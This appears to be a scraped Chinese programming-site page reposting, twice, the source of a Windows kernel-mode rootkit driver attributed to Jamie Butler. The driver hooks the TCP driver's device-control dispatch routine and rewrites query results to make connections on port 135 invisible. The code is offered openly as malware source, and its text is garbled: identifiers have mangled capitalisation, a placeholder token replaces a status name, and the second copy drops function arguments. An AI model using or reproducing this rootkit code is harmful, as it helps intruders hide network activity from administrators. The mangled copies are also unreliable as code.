隐藏tcp端口,来自看雪
///////////////////////////////////////////////////////////////////////////////////////// filename Rootkit.c// // Author: JamIE Butler// Email: [email protected] or [email protected]//// Description: This is where the work gets done.//// Version: 1.0// #include "ntddk.h"#include "tdiinfo.h"//#include "stdio.h"//#include "stdlib.h"#include "Rootkit.h" NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath ){ NTSTATUS ntStatus; oldIrpMjDeviceControl = NulL; DriverObject->DriverUnload = RootkitUnload; ntStatus = InstallTCPDriverHook(); if(!NT_SUCCESS(ntStatus)) return ntStatus; return STATUS_SUCCESS;}NTSTATUS InstallTCPDriverHook(){ NTSTATUS ntStatus;// UNICODE_STRING devicenameUnicodeString;// UNICODE_STRING devicelinkUnicodeString; UNICODE_STRING deviceTcpunicodeString; WCHAR deviceTCPnameBuffer[] = L"\Device\Tcp"; pfile_tcp = NulL; pDev_tcp = NulL; pDrv_tcpip = NulL; RtlinitUnicodeString (&deviceTcpunicodeString,deviceTCPnameBuffer); ntStatus = IoGetDeviceObjectPointer(&deviceTcpunicodeString,file_READ_DATA,&pfile_tcp,&pDev_tcp); if(!NT_SUCCESS(ntStatus)) { DbgPrint("读取失败!"); return ntStatus; } DbgPrint("读取成功!"); pDrv_tcpip = pDev_tcp->DriverObject; oldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTRol]; if (oldIrpMjDeviceControl) InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTRol],(LONG)HookedDeviceControl); return STATUS_SUCCESS;}NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp){ PIO_STACK_LOCATION irpStack; ulONG ioTransferType; TdiobjectID *inputBuffer; DWORD context; //DbgPrint("The current IRP is at %x\n",Irp); // Get a pointer to the current location in the Irp. This is where // the function codes and parameters are located. irpStack = IoGetCurrentIrpStackLocation (Irp); switch (irpStack->MajorFunction) { case IRP_MJ_DEVICE_CONTRol: if ((irpStack->MinorFunction == 0) && (irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_query_informatION_EX)) { ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode; ioTransferType &= 3; if (ioTransferType == METHOD_NEITHER) // Need to kNow the method to find input buffer { inputBuffer = (TdiobjectID *) irpStack->Parameters.DeviceIoControl.Type3inputBuffer; // CO_TL_ENTITY is for TCP and CL_TL_ENTITY is for UDP if (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY) { DbgPrint("input buffer %x\n",inputBuffer); if ((inputBuffer->toi_ID == 0x101) || (inputBuffer->toi_ID == 0x102) || (inputBuffer->toi_ID == 0x110)) { // Call our completion routine if IRP successful irpStack->Control = 0; irpStack->Control |= SL_INVOKE_ON_SUCCESS; // Save old completion routine if present irpStack->Context = (PIO_COMPLETION_ROUTINE) ExAllocatePool(NonPagedPool,sizeof(REQINFO)); ((PREQINFO)irpStack->Context)->oldCompletion = irpStack->CompletionRoutine; ((PREQINFO)irpStack->Context)->ReqType = inputBuffer->toi_ID; // Setup our function to be called on completion of IRP irpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE)IoCompletionRoutine; } } } } break; default: break; } return oldIrpMjDeviceControl(DeviceObject,Irp);}NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp,IN PVOID Context){ PVOID OutputBuffer; DWORD NumOutputBuffers; PIO_COMPLETION_ROUTINE p_compRoutine; DWORD i; // Connection status values: // 0 = Invisible // 1 = CLOSED // 2 = @R_502_6818@ENING // 3 = SYN_SENT // 4 = SYN_RECEIVED // 5 = ESTABliSHED // 6 = FIN_WAIT_1 // 7 = FIN_WAIT_2 // 8 = CLOSE_WAIT // 9 = CLOSING // ... OutputBuffer = Irp->UserBuffer; p_compRoutine = ((PREQINFO)Context)->oldCompletion; if (((PREQINFO)Context)->ReqType == 0x101) { NumOutputBuffers = Irp->IoStatus.information / sizeof(CONNINFO101); for(i = 0; i < NumOutputBuffers; i++) { // HIDe all Web connections if (HTONS(((PCONNINFO101)OutputBuffer)[i].src_port) == 135) ((PCONNINFO101)OutputBuffer)[i].status = 0; } } else if (((PREQINFO)Context)->ReqType == 0x102) { NumOutputBuffers = Irp->IoStatus.information / sizeof(CONNINFO102); for(i = 0; i < NumOutputBuffers; i++) { // HIDe all Web connections if (HTONS(((PCONNINFO102)OutputBuffer)[i].src_port) == 135) ((PCONNINFO102)OutputBuffer)[i].status = 0; } } else if (((PREQINFO)Context)->ReqType == 0x110) { NumOutputBuffers = Irp->IoStatus.information / sizeof(CONNINFO110); for(i = 0; i < NumOutputBuffers; i++) { // HIDe all Web connections if (HTONS(((PCONNINFO110)OutputBuffer)[i].src_port) == 135) ((PCONNINFO110)OutputBuffer)[i].status = 0; } } ExFreePool(Context); /* for(i = 0; i < NumOutputBuffers; i++) { DbgPrint("Status: %d",OutputBuffer[i].status); DbgPrint(" %d.%d.%d.%d:%d",OutputBuffer[i].src_addr & 0xff,OutputBuffer[i].src_addr >> 8 & 0xff,OutputBuffer[i].src_addr >> 16 & 0xff,OutputBuffer[i].src_addr >> 24,HTONS(OutputBuffer[i].src_port)); DbgPrint(" %d.%d.%d.%d:%d\n",OutputBuffer[i].dst_addr & 0xff,OutputBuffer[i].dst_addr >> 8 & 0xff,OutputBuffer[i].dst_addr >> 16 & 0xff,OutputBuffer[i].dst_addr >> 24,HTONS(OutputBuffer[i].dst_port)); }*/ if ((Irp->StackCount > (ulONG)1) && (p_compRoutine != NulL)) { return (p_compRoutine)(DeviceObject,Irp,NulL); } else { return Irp->IoStatus.Status; }}NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject){ if (oldIrpMjDeviceControl) InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTRol],(LONG)oldIrpMjDeviceControl); if (pfile_tcp != NulL) ObDereferenceObject(pfile_tcp); pfile_tcp = NulL; return STATUS_SUCCESS;}
///////////////////////////////////////////////////////////////////////////////////////// filename Rootkit.c// // Author: JamIE Butler// Email: [email protected] or [email protected]//// Description: This is where the work gets done.//// Version: 1.0// #include "ntddk.h"#include "tdiinfo.h"//#include "stdio.h"//#include "stdlib.h"#include "Rootkit.h" NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath){ NTSTATUS ntStatus;oldIrpMjDeviceControl = NulL; DriverObject->DriverUnload = RootkitUnload;ntStatus = InstallTCPDriverHook();if(!NT_SUCCESS(ntStatus)) return ntStatus;return STATUS_SUCCESS;}NTSTATUS InstallTCPDriverHook(){ NTSTATUS ntStatus;// UNICODE_STRING devicenameUnicodeString;// UNICODE_STRING devicelinkUnicodeString; UNICODE_STRING deviceTcpunicodeString;WCHAR deviceTCPnameBuffer[] = L"\\Device\\Tcp"; pfile_tcp = NulL;pDev_tcp = NulL;pDrv_tcpip = NulL;RtlinitUnicodeString (&deviceTcpunicodeString,deviceTCPnameBuffer);ntStatus = IoGetDeviceObjectPointer(&deviceTcpunicodeString,&pDev_tcp);if(!NT_SUCCESS(ntStatus)) {DbgPrint("读取失败!");return ntStatus;}DbgPrint("读取成功!");pDrv_tcpip = pDev_tcp->DriverObject;oldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTRol]; if (oldIrpMjDeviceControl)InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTRol],(LONG)HookedDeviceControl);return STATUS_SUCCESS;}NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp){ PIO_STACK_LOCATION irpStack; ulONG ioTransferType;TdiobjectID *inputBuffer;DWORDcontext;//DbgPrint("The current IRP is at %x\n",Irp); // Get a pointer to the current location in the Irp. This is where // the function codes and parameters are located. irpStack = IoGetCurrentIrpStackLocation (Irp); switch (irpStack->MajorFunction) { case IRP_MJ_DEVICE_CONTRol:if ((irpStack->MinorFunction == 0) && \(irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_query_informatION_EX)){ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode;ioTransferType &= 3;if (ioTransferType == METHOD_NEITHER) // Need to kNow the method to find input buffer{inputBuffer = (TdiobjectID *) irpStack->Parameters.DeviceIoControl.Type3inputBuffer;// CO_TL_ENTITY is for TCP and CL_TL_ENTITY is for UDPif (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY){ DbgPrint("input buffer %x\n",inputBuffer);if ((inputBuffer->toi_ID == 0x101) || (inputBuffer->toi_ID == 0x102) || (inputBuffer->toi_ID == 0x110)){// Call our completion routine if IRP successfulirpStack->Control = 0;irpStack->Control |= SL_INVOKE_ON_SUCCESS; // Save old completion routine if presentirpStack->Context = (PIO_COMPLETION_ROUTINE) ExAllocatePool(NonPagedPool,sizeof(REQINFO));((PREQINFO)irpStack->Context)->oldCompletion = irpStack->CompletionRoutine; ((PREQINFO)irpStack->Context)->ReqType = inputBuffer->toi_ID;// Setup our function to be called on completion of IRPirpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE)IoCompletionRoutine;}}}}break;default:break; } return oldIrpMjDeviceControl(DeviceObject,Irp);}NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context){PVOID OutputBuffer; DWORD NumOutputBuffers;PIO_COMPLETION_ROUTINE p_compRoutine;DWORD i;// Connection status values:// 0 = Invisible// 1 = CLOSED// 2 = @R_502_6818@ENING// 3 = SYN_SENT// 4 = SYN_RECEIVED// 5 = ESTABliSHED// 6 = FIN_WAIT_1// 7 = FIN_WAIT_2// 8 = CLOSE_WAIT// 9 = CLOSING// ...OutputBuffer = Irp->UserBuffer;p_compRoutine = ((PREQINFO)Context)->oldCompletion;if (((PREQINFO)Context)->ReqType == 0x101){NumOutputBuffers = Irp->IoStatus.information / sizeof(CONNINFO101);for(i = 0; i < NumOutputBuffers; i++){// HIDe all Web connectionsif (HTONS(((PCONNINFO101)OutputBuffer)[i].src_port) == 135)((PCONNINFO101)OutputBuffer)[i].status = 0;}}else if (((PREQINFO)Context)->ReqType == 0x102){NumOutputBuffers = Irp->IoStatus.information / sizeof(CONNINFO102);for(i = 0; i < NumOutputBuffers; i++){// HIDe all Web connectionsif (HTONS(((PCONNINFO102)OutputBuffer)[i].src_port) == 135)((PCONNINFO102)OutputBuffer)[i].status = 0;}}else if (((PREQINFO)Context)->ReqType == 0x110){NumOutputBuffers = Irp->IoStatus.information / sizeof(CONNINFO110);for(i = 0; i < NumOutputBuffers; i++){// HIDe all Web connectionsif (HTONS(((PCONNINFO110)OutputBuffer)[i].src_port) == 135)((PCONNINFO110)OutputBuffer)[i].status = 0;}}ExFreePool(Context);/*for(i = 0; i < NumOutputBuffers; i++){DbgPrint("Status: %d",OutputBuffer[i].status);DbgPrint(" %d.%d.%d.%d:%d",HTONS(OutputBuffer[i].src_port));DbgPrint(" %d.%d.%d.%d:%d\n",HTONS(OutputBuffer[i].dst_port));}*/if ((Irp->StackCount > (ulONG)1) && (p_compRoutine != NulL)){return (p_compRoutine)(DeviceObject,NulL);}else{return Irp->IoStatus.Status;}}NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject){if (oldIrpMjDeviceControl)InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTRol],(LONG)oldIrpMjDeviceControl);if (pfile_tcp != NulL)ObDereferenceObject(pfile_tcp);pfile_tcp = NulL;return STATUS_SUCCESS;}
总结以上是内存溢出为你收集整理的HideTcpip.c全部内容,希望文章能够帮你解决HideTcpip.c所遇到的程序开发问题。
如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)